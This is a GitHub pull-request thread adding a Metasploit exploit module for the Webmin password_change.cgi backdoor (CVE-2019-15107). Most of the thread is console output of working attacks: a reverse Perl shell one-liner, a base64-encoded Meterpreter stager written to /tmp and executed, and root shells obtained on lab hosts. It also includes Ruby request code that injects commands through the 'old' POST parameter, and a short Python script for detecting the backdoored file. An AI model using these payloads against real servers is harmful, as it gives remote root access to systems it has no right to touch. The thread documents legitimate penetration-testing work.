
Add Webmin password_change.cgi backdoor exploit #12219

Merged
merged 11 commits into from Aug 23, 2019

Conversation

@wvu-r7
Contributor

commented Aug 21, 2019

Background

Please read http://www.webmin.com/exploit.html for full context.

Backdoored Webmin 1.890

msf5 exploit(unix/webapp/webmin_backdoor) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Webmin 1.890 detected
[+] Webmin 1.890 is a supported target
[+] Webmin executed a benign check command
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Generated command payload: perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"172.28.128.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.5:58374) at 2019-08-21 16:49:24 -0500

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
^Z
Background session 1? [y/N]  y
msf5 exploit(unix/webapp/webmin_backdoor) > set target 1
target => 1
msf5 exploit(unix/webapp/webmin_backdoor) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Webmin 1.890 detected
[+] Webmin 1.890 is a supported target
[+] Webmin executed a benign check command
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x64/meterpreter/reverse_tcp command stager
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/FgFBP.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/tDGmH' < '/tmp/FgFBP.b64' ; chmod +x '/tmp/tDGmH' ; '/tmp/tDGmH' ; rm -f '/tmp/tDGmH' ; rm -f '/tmp/FgFBP.b64'"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.28.128.5
[*] Meterpreter session 2 opened (172.28.128.1:4444 -> 172.28.128.5:58376) at 2019-08-21 16:49:33 -0500
[*] Command Stager progress - 100.00% done (819/819 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.0.2.15
OS           : Ubuntu 16.04 (Linux 4.4.0-141-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Backdoored Webmin 1.920 (passwd_mode=2)

msf5 exploit(unix/webapp/webmin_backdoor) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Webmin 1.920 detected
[+] Webmin 1.920 is a supported target
[+] Webmin executed a benign check command
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Generated command payload: perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"172.28.128.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.5:58370) at 2019-08-21 16:57:04 -0500

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
^Z
Background session 1? [y/N]  y
msf5 exploit(unix/webapp/webmin_backdoor) > set target 1
target => 1
msf5 exploit(unix/webapp/webmin_backdoor) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Webmin 1.920 detected
[+] Webmin 1.920 is a supported target
[+] Webmin executed a benign check command
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x64/meterpreter/reverse_tcp command stager
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/kuwKL.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/gNRPw' < '/tmp/kuwKL.b64' ; chmod +x '/tmp/gNRPw' ; '/tmp/gNRPw' ; rm -f '/tmp/gNRPw' ; rm -f '/tmp/kuwKL.b64'"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.28.128.5
[*] Meterpreter session 2 opened (172.28.128.1:4444 -> 172.28.128.5:58372) at 2019-08-21 16:57:12 -0500
[*] Command Stager progress - 100.00% done (819/819 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.0.2.15
OS           : Ubuntu 16.04 (Linux 4.4.0-141-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Backdoored Webmin 1.920 (passwd_mode=0)

msf5 exploit(unix/webapp/webmin_backdoor) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Webmin 1.920 detected
[+] Webmin 1.920 is a supported target
[-] Expired password changing disabled
[-] Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/webmin_backdoor) >

Fixed Webmin 1.930

msf5 exploit(unix/webapp/webmin_backdoor) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Webmin 1.930 detected
[-] Webmin 1.930 is not a supported target
[-] Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/webmin_backdoor) >
@jrobles-r7

Contributor

commented Aug 21, 2019

The POST parameters that are needed for Webmin v1.900 are old, new1, and new2.
The command injection is in old. new1 and new2 must be equal.

@mekhalleh

commented Aug 21, 2019

Hello, this works fine on v.1.9000

# Method from a Metasploit exploit module; send_request_cgi, normalize_uri,
# target_uri and peer come from the Msf::Exploit::Remote::HttpClient mixin.
def send_command(cmd)
  new_password = Rex::Text.rand_text_alpha(8)
  send_request_cgi(
    'method'  => 'POST',
    'cookie'  => 'redirect=1; testing=1; sid=x; sessiontest=1',
    'ctype'   => 'application/x-www-form-urlencoded',
    'uri'     => normalize_uri(target_uri.path, 'password_change.cgi'),
    'headers' => { 'Referer' => "#{peer}/session_login.cgi" },
    # new1 and new2 must match; the command rides in the old parameter
    'data'    => "user=#{Rex::Text.rand_text_alpha(8)}&pam=&expired=2&old=#{Rex::Text.rand_text_alpha(8)} | #{cmd}&new1=#{new_password}&new2=#{new_password}&Submit"
  )
end
@jrobles-r7

Contributor

commented Aug 21, 2019

While testing for v1.900 I found that user, pam, and expired can be removed from the POST parameters.
Also the | is not needed in the old parameter. The command injection can be placed in old without a |.

@wvu-r7

Contributor Author

commented Aug 21, 2019

Since the alleged command injection is actually the qx operator and not an unsafe open(), the fact that | works is incidental, since it can be used as a command separator.

Here's the diff I was working off:

wvu@kharak:~/Downloads$ diff3 webmin-1.{890,930,920}/password_change.cgi
====2
1:1c
3:1c
  #!/usr/bin/perl
2:1c
  #!/usr/local/bin/perl
====1
1:12c
  $in{'expired'} eq '' || die $text{'password_expired'},qx/$in{'expired'}/;
2:12c
3:12c
  $miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";
====3
1:40c
2:40c
  	$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'});
3:40c
  	$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
====3
1:200c
2:200c
  # Show ok page
3:200c

wvu@kharak:~/Downloads$

I'll document it shortly.
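As an added defensive check (written for this thread, not part of the PR or of Metasploit), the script below turns the diff3 lines above into a file-integrity test: it flags a password_change.cgi that applies qx// to a request parameter, and uses passwd_mode from miniserv.conf to say whether the 1.920 variant is reachable, which is why the passwd_mode=0 run in the description aborts. The sample sources and config strings are constructed to mirror the diff3 output.

```python
import re

# The backdoor, per the diff3 output above, is qx// applied to a request parameter:
# $in{'expired'} in 1.890 and $in{'old'} in 1.920. Legitimate code never does this.
BACKDOOR_RE = re.compile(r"qx/\$in\{'(expired|old)'\}/")

def scan_password_change(source):
    """Return (line_number, parameter) for every line that shells out to a request parameter."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = BACKDOOR_RE.search(line)
        if m:
            hits.append((lineno, m.group(1)))
    return hits

def passwd_mode(miniserv_conf):
    """Read passwd_mode from miniserv.conf text (key=value lines); Webmin's default is 0."""
    for line in miniserv_conf.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "passwd_mode":
            return int(value.strip()) if value.strip().isdigit() else 0
    return 0

def assess(source, miniserv_conf):
    """'clean', 'backdoored' (reachable as-is) or 'backdoored-dormant' (blocked by passwd_mode)."""
    params = {p for _, p in scan_password_change(source)}
    if not params:
        return "clean"
    # 1.890 runs qx on 'expired' with no config guard; 1.920 runs qx on 'old' only
    # after the "$miniserv{'passwd_mode'} == 2 || die" check, so mode 0 stops it.
    if "expired" in params or passwd_mode(miniserv_conf) == 2:
        return "backdoored"
    return "backdoored-dormant"

# Constructed samples mirroring the diff3 lines in the thread (not real Webmin files).
CLEAN_SRC = (
    "#!/usr/local/bin/perl\n"
    "$miniserv{'passwd_mode'} == 2 || die \"Password changing is not enabled!\";\n"
    "$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'});\n"
)
SRC_1890 = (
    "#!/usr/bin/perl\n"
    "$in{'expired'} eq '' || die $text{'password_expired'},qx/$in{'expired'}/;\n"
)
SRC_1920 = (
    "#!/usr/bin/perl\n"
    "$miniserv{'passwd_mode'} == 2 || die \"Password changing is not enabled!\";\n"
    "$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);\n"
)
```

Run it against a real install by reading the Webmin password_change.cgi and miniserv.conf into the two string arguments; any result other than "clean" means the file differs from the 1.930 fix and should be replaced from a trusted source.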

wvu-r7 added 6 commits Aug 21, 2019

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/webmin branch from c69cc30 to 6b8c0bc Aug 21, 2019

@wvu-r7 wvu-r7 removed the needs-docs label Aug 21, 2019

@wvu-r7 wvu-r7 changed the title [WIP] Add Webmin password_change.cgi backdoor exploit Add Webmin password_change.cgi backdoor exploit Aug 21, 2019

@wvu-r7 wvu-r7 removed the delayed label Aug 21, 2019

@wvu-r7 wvu-r7 marked this pull request as ready for review Aug 21, 2019

Simplify request by combining POST parameters
There's no need to discriminate between versions. Send 'em all.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/webmin branch from 98d63df to dff2aed Aug 21, 2019

@wvu-r7

Contributor Author

commented Aug 21, 2019

Targeting is automatic now. I don't care enough to readd the version-specific targets, and there's ForceExploit anyway. I've got other stuff to do, so I'm done here. Thanks, everyone!

@jrobles-r7

Contributor

commented Aug 23, 2019

Tested against Webmin v1.900

msf5 exploit(unix/webapp/webmin_backdoor) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.112:48536) at 2019-08-23 08:50:08 -0500

whoami
root
uname -a
Linux ubuntu 5.0.0-25-generic #26~18.04.1-Ubuntu SMP Thu Aug 1 13:51:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y
""

[*] 172.22.222.112 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(unix/webapp/webmin_backdoor) > set verbose true
verbose => true
msf5 exploit(unix/webapp/webmin_backdoor) > check

[*] Webmin 1.900 detected
[+] Webmin 1.900 is a supported target
[+] Webmin executed a benign check command
[+] 172.22.222.112:10000 - The target is vulnerable.
msf5 exploit(unix/webapp/webmin_backdoor) > 
jrobles-r7 added a commit that referenced this pull request Aug 23, 2019

@jrobles-r7 jrobles-r7 merged commit dff2aed into rapid7:master Aug 23, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Aug 23, 2019
@jrobles-r7

Contributor

commented Aug 23, 2019

Release Notes

A module that exploits CVE-2019-15107 is now available in Metasploit framework. It exploits a backdoor in SourceForge downloads of Webmin versions 1.890 through 1.920. Please read http://www.webmin.com/exploit.html for full context.

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/webmin branch Aug 23, 2019

@tdoan-r7 tdoan-r7 added the rn-modules label Sep 5, 2019
